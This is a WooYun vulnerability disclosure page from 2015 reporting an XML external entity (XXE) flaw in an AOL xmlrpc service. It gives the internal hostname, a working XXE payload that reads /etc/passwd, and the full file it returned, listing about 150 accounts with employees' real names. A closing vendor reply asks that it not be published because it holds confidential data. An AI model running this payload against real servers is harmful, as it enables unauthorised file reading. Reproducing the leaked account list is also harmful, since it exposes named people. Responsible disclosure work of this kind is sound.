当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148793

漏洞标题:AOL Website XML External Entity(XXE) Vulnerability

相关厂商:aol.com

漏洞作者: 猪猪侠

提交时间:2015-10-23 01:33

修复时间:2015-12-11 00:18

公开时间:2015-12-11 00:18

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

When processing a POST request body containing XML, the XML parser can be instructed to read content from network and local file resources accessible to the host

详细说明:

#1 xmlrpc service

http://dbr-bulk-shared-b-atc.evip.aol.com/xmlrpc

漏洞证明:

#2 exploit

POST
<?xml version="1.0"?> <!DOCTYPE foo [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><methodCall>  <methodName>&xxe;</methodName></methodCall>


xmlrpc.jpg


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server User:/home/postgres:/bin/bash
mysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/null
piranha:x:60:60::/etc/sysconfig/ha:/dev/null
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
quantum:x:229:30:Quantum:/home/quantum:/bin/ksh
jsschiff:x:419:20:Jonathan Schiff:/home/jsschiff:/bin/bash
saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
abrt:x:499:499::/etc/abrt:/sbin/nologin
fsemaan:x:568:1026:Fady Semaan:/home/fsemaan:/bin/bash
gffletch:x:740:1026:George Fletcher:/home/gffletch:/bin/bash
shallett:x:781:1026:Stephen Hallett:/home/shallett:/bin/bash
sapiadm:x:789:30:IIOPS SAPI Admin Account:/home/sapiadm:/bin/bash
dlevy:x:801:1051:Douglas Levy:/home/dlevy:/bin/bash
cohenn:x:877:20:Neil Cohen:/home/cohenn:/bin/bash
sybase:x:950:60:Sybase DBA:/home/sybase:/bin/ksh
richard:x:1206:81:Richard Rodriguez-Val:/home/richard:/bin/bash
netadm:x:1562:81:Network Operations:/home/netadm:/bin/bash
awick:x:1612:20:Andy Wick:/home/awick:/bin/bash
danshong:x:1673:1026:Dan Hong:/home/danshong:/bin/bash
bangklee:x:2125:1026:Bang Lee:/home/bangklee:/bin/bash
prjones:x:2308:1026:Peter Jones:/home/prjones:/bin/bash
lshoang:x:2386:1026:Lynn Hoang:/home/lshoang:/bin/bash
saunders:x:2597:1026:James Saunders:/home/saunders:/bin/bash
karen:x:2683:1026:Karen Johnson:/home/karen:/bin/bash
jingwu:x:3017:1026:Jing Wu:/home/jingwu:/bin/bash
kpulak:x:3246:1026:Ken Pulak:/home/kpulak:/bin/bash
nims:x:3374:1002:Chris Nims:/home/nims:/bin/bash
dhaydon:x:3879:1026:Doug Haydon:/home/d/dhaydon:/bin/bash
newaol:x:4052:1218:Web Server Account:/home/newaol:/bin/bash
zhaoxi:x:4323:1026:Zhaoxi Bu:/home/zhaoxi:/bin/bash
kpettit:x:4572:1026:Kevin Pettit:/home/kpettit:/bin/bash
qrq:x:4613:1026:IIOPS QA Test User:/home/qrq:/bin/bash
mandrews:x:4752:1026:Michael Andrews:/home/mandrews:/bin/bash
uwelovas:x:4793:1026:Uwe Lovas:/home/uwelovas:/bin/bash
gleework:x:5040:1026:Glen Lee:/home/g/gleework:/bin/tcsh
mcarpet:x:5141:1195:Magic Carpet:/home/mcarpet:/bin/bash
slinhart:x:5174:125:Steven Linhart:/home/slinhart:/bin/bash
vvsaxena:x:5175:1026:Vishal Saxena:/home/vvsaxena:/bin/bash
moeller:x:5202:1026:Kurt Moeller:/home/moeller:/bin/bash
mmiranda:x:5217:1026:Maxie Miranda:/home/mmiranda:/bin/bash
dvoss:x:5408:1026:Daniel Voss:/home/dvoss:/bin/bash
lachlan:x:5435:1035:Lachlan Maxwell:/home/lachlan:/bin/bash
dps:x:5436:1026:Donald Sengpiehl:/home/d/dps:/bin/ksh
zgrodek:x:5479:1026:Renee Sribar:/home/zgrodek:/bin/bash
pmorgan:x:5490:1026:Paul Morgan:/home/pmorgan:/bin/bash
rjmyers:x:5582:1013:Roy Myers:/home/rjmyers:/bin/bash
qrqt:x:5895:1026:IIOPS qrqt test system owner:/home/qrqt:/bin/bash
cmontano:x:6313:1026:Carlos Montano:/home/cmontano:/bin/bash
mfbma:x:6529:1026:Brian Ayala:/home/mfbma:/bin/bash
cpfort:x:6660:1002:Chris Fort:/home/cpfort:/bin/bash
gsayadia:x:6705:1222:Greg Sayadian:/home/gsayadia:/bin/bash
zhanglu:x:6817:60:Zhang Lu:/home/zhanglu:/bin/bash
sliang:x:7317:1026:Steven Liang:/home/sliang:/bin/bash
bsun21:x:7946:951:Bruce Sun:/home/bsun21:/bin/bash
jbothe:x:8213:1026:Jocelyn Bothe:/home/jbothe:/bin/bash
kblackic:x:8339:1026:Ken Black:/home/kblackic:/bin/bash
schnee:x:8627:1026:Joel Schnee:/home/schnee:/bin/bash
mcgerakr:x:8641:1002:Keith McGerald:/home/mcgerakr:/bin/bash
bbbrown:x:8664:1026:Robert Brown:/home/bbbrown:/bin/bash
djian:x:8732:1026:Dan Jian:/home/djian:/bin/bash
willjw:x:8815:1026:William Won:/home/willjw:/bin/bash
devel:x:8981:1296:IIOPS dev test system owner:/home/devel:/bin/bash
richr:x:9051:1002:Rich Rubenstein:/home/richr:/bin/bash
mdunbar:x:9148:1026:Matthew Dunbar:/home/mdunbar:/bin/bash
pemkes:x:9438:1026:Paul Emkes:/home/pemkes:/bin/bash
akoshy:x:9641:951:Ashy Koshy:/home/a/akoshy:/bin/bash
dev:x:11062:11062:CS dev:/home/dev:/bin/bash
chuongmp:x:12459:1026:Chuong Pham:/home/chuongmp:/bin/bash
jobi:x:13695:1026:JOBI:/home/jobi:/bin/bash
nagios:x:13783:1617:Billing nagios:/home/nagios:/bin/ksh
rmadini:x:14189:1026:Radhika Madini:/home/rmadini:/bin/bash
mcarpet3:x:14436:1638:AOL - Web Authentication System:/home/mcarpet3:/bin/bash
rrost:x:16383:1026:Robert Rost:/home/rrost:/bin/bash
dixonjm:x:16464:1026:Jen Dixon:/home/dixonjm:/bin/bash
billwake:x:16958:1026:William Wakefield:/home/billwake:/bin/bash
sophiaa:x:17484:1026:Sophia Arokiaraj:/home/s/sophiaa:/bin/bash
taraschk:x:17630:1026:Matthew Taraschke:/home/taraschk:/bin/bash
rajeev:x:18163:130:Rajeev Manghnani:/home/rajeev:/bin/ksh
openauth:x:18193:1638:SNS's Open Auth:/home/openauth:/bin/bash
mohamed1:x:18676:1026:Mohamed Osman:/home/mohamed1:/bin/bash
dpadmin:x:18734:11337:IIOPS Dynapub Application User:/home/dpadmin:/bin/bash
tb321:x:19109:1026:Terrance Burke:/home/tb321:/bin/bash
amitv:x:19573:1026:Amit Varde:/home/amitv:/bin/bash
modsec:x:19696:11366:IIOPS modsec:/home/modsec:/bin/bash
fenerty:x:19955:1026:Vinny Fenerty:/home/fenerty:/bin/bash
gopinath:x:20352:1026:Gopinath Kalidass:/home/gopinath:/bin/bash
moiztcs:x:20726:130:Moiz Arafat:/home/moiztcs:/bin/bash
venug:x:21433:1026:Venu Vejandla:/home/venug:/bin/bash
gaurav:x:21438:130:Gaurav Agrawal:/home/gaurav:/bin/bash
kkumar:x:21499:1026:Krishnakumar Subramanian:/home/kkumar:/bin/bash
rpokhare:x:21654:1026:Ranjan Pokharel:/home/rpokhare:/bin/bash
mongodb:x:21780:11593:Default mongodb for COI:/home/mongodb:/bin/bash
csoohoo:x:21995:1026:Chris Soo Hoo:/home/csoohoo:/bin/bash
jmurillo:x:22092:1026:Jady Murillo:/home/jmurillo:/bin/bash
ptivnan:x:22109:1026:Patrick Tivnan:/home/ptivnan:/bin/bash
jmcqueen:x:22166:1026:Jeff McQueen:/home/jmcqueen:/bin/bash
kristinb:x:22172:1026:Kristin Boran:/home/kristinb:/bin/bash
abudri11:x:22306:1026:Abdullah Budri:/home/abudri11:/bin/bash
scharles:x:22527:1026:Charles Sinclair:/home/scharles:/bin/bash
ctoby:x:22546:1026:Cindy Toby:/home/ctoby:/bin/bash
jcobb29:x:22623:1026:Justin Cobb:/home/jcobb29:/bin/bash
skunchak:x:22642:1026:Sivaprasad Kunchakuri:/home/skunchak:/bin/bash
bhashimi:x:22647:1026:Belal Hashimi:/home/bhashimi:/bin/bash
aashish:x:22677:130:Amit Ashish:/home/aashish:/bin/ksh
paulv:x:22734:1026:Paul Vuchetich:/home/paulv:/bin/bash
bbarek:x:22769:1026:Bahier Barekzoy:/home/bbarek:/bin/bash
vbsetty:x:22856:1026:Venkata Bavirisetty:/home/vbsetty:/bin/bash
phanin:x:23037:1026:Phanindra Golkonda:/home/phanin:/bin/bash
ewolk:x:23132:1026:Ethan Wolkowicz:/home/ewolk:/bin/bash
teddoro:x:23222:1026:Ted Dorosheff:/home/teddoro:/bin/bash
mhartman:x:23340:1026:Matt Hartman:/home/mhartman:/bin/bash
zkelly44:x:23432:1026:ZacK Kelly:/home/zkelly44:/bin/bash
jdesmet:x:23549:1026:Jordan Desmet:/home/jdesmet:/bin/bash
radn14:x:23565:1026:Radoslaw Niedzialkowski:/home/radn14:/bin/bash
par13:x:23572:1026:Paul Rehbock:/home/par13:/bin/bash
hchauhan:x:23616:1026:Himanshu Chauhan:/home/hchauhan:/bin/bash
averkhov:x:23639:1026:Alex Verkhovtsev:/home/averkhov:/bin/bash
bolson:x:23669:1026:Brian Olson:/home/bolson:/bin/bash
shivahuv:x:23810:1026:Shivanand Huvinahalli:/home/shivahuv:/bin/bash
dkalyan:x:23822:1026:Deepak Kalyan:/home/dkalyan:/bin/bash
vrpoth2:x:23858:1026:Vivek Reddy Pothukolu:/home/vrpoth2:/bin/bash
pajones:x:23892:1026:Paul Jones:/home/pajones:/bin/bash
gquiroz:x:23909:1026:Geraldine Quiroz:/home/gquiroz:/bin/bash
shosey:x:23910:1026:Sean Hosey:/home/shosey:/bin/bash
ianmc:x:23911:1026:Ian Mcdonald:/home/ianmc:/bin/bash
slenka83:x:23952:1026:Soumya Lenka:/home/slenka83:/bin/bash
oqasmi:x:23960:1026:Omar Qasmi:/home/oqasmi:/bin/bash
jcaplan:x:23990:1026:Jeffrey Caplan:/home/jcaplan:/bin/bash
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

修复方案:

http://www.vsecurity.com/download/publications/XMLDTDEntityAttacks.pdf
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-27 00:16

厂商回复:

最新状态:

2015-12-10:Please do not publicly release this vulnerability, as it contains confidential data.